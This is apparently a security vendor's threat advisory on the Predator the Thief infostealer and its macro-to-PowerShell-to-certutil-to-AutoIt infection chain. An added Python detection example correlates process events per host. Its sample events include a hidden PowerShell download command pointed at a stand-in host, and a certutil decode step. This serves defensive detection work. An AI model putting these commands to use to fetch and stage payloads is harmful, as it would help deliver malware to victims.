

Rewterz Threat Alert – Cryptocurrency Business Continued to be Targeted by Lazarus
January 8, 2020
Rewterz Threat Advisory – CVE-2020-6377 – Google Chrome Audio Code Execution Vulnerability
January 9, 2020
Severity
Medium
Analysis Summary
A new version of the malware known as Predator the Thief, labeled 3.3.4, has been released. Each minor version introduced small development changes, and taken together they make this latest version very different from previous versions. It has been active since at least December 2019. The recent campaign uses phishing documents designed to look like invoices, all delivering the same Predator the Thief payload.

Infection chain of Predator the Thief

Once the document is opened, the malware performs the following operations:
1. The AutoOpen macro runs the malware's VBA script.
2. The script downloads three files through PowerShell:
- VjUea.dat: the legitimate AutoIt3.exe
- SevSS.dat: a Base64-encoded AutoIt script with a certificate header
- apTz.dat: the RC4-encrypted Predator the Thief payload

3. It then uses the legitimate AutoIt3.exe to run the decoded AutoIt script.
"SevSS.dat" is decoded by certutil.exe, a legitimate command line program that is part of the Certificate Services in Windows. The decoded script is then run to decrypt apTz.dat into the Predator the Thief payload.
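As an added example (not Rewterz tooling or code from the advisory), the detection logic below checks constructed Sysmon-style process-creation events for the three stages described above: Office-spawned PowerShell, certutil -decode on a .dat file, and a renamed AutoIt3.exe identified by its PE OriginalFileName. Hostnames, paths, the download host and the event field names are assumptions; only the .dat file names come from the advisory.

```python
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style fields): one host
# that ran the chain described above and one that only used certutil legitimately.
# Hostnames, paths and the download host are made up; the .dat names come from the advisory.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "original_name": "PowerShell.EXE",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/apTz.dat','C:\\Users\\Public\\apTz.dat')"},
    {"host": "ws01", "parent": "powershell.exe", "image": "certutil.exe",
     "original_name": "CertUtil.exe",
     "cmdline": "certutil -decode C:\\Users\\Public\\SevSS.dat C:\\Users\\Public\\SevSS.au3"},
    {"host": "ws01", "parent": "powershell.exe", "image": "VjUea.dat",
     "original_name": "AutoIt3.exe",
     "cmdline": "C:\\Users\\Public\\VjUea.dat C:\\Users\\Public\\SevSS.au3"},
    {"host": "ws02", "parent": "explorer.exe", "image": "certutil.exe",
     "original_name": "CertUtil.exe",
     "cmdline": "certutil -verify C:\\Temp\\server.cer"},
]

def office_spawned_powershell(ev):
    """Stage 1: the macro's PowerShell downloader is a child of an Office process."""
    return ev["parent"].lower() in {"winword.exe", "excel.exe"} and ev["image"].lower() == "powershell.exe"

def certutil_decode_dat(ev):
    """Stage 2: certutil -decode applied to a .dat file (Base64 with certificate header)."""
    cmd = ev["cmdline"].lower()
    return ev["image"].lower() == "certutil.exe" and "-decode" in cmd and ".dat" in cmd

def renamed_autoit(ev):
    """Stage 3: a binary whose PE original name is AutoIt3.exe runs under another file name."""
    return ev["original_name"].lower() == "autoit3.exe" and ev["image"].lower() != "autoit3.exe"

RULES = {"office_spawned_powershell": office_spawned_powershell,
         "certutil_decode_dat": certutil_decode_dat,
         "renamed_autoit": renamed_autoit}

def evaluate(events):
    """Map each host to the sorted names of the stage rules that fired on it."""
    hits = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items()}

def chain_suspects(events, min_stages=2):
    """Hosts where at least min_stages of the three stages were observed together."""
    return sorted(h for h, names in evaluate(events).items() if len(names) >= min_stages)
```

Correlating the stages per host matters because each rule alone (a PowerShell child of Word, a certutil -decode call) also fires on some legitimate activity.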

Impact
Data exfiltration
Indicators of Compromise
SHA-256
URL
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious of emails from unknown senders.
- Never click on links or open attachments sent by unknown senders.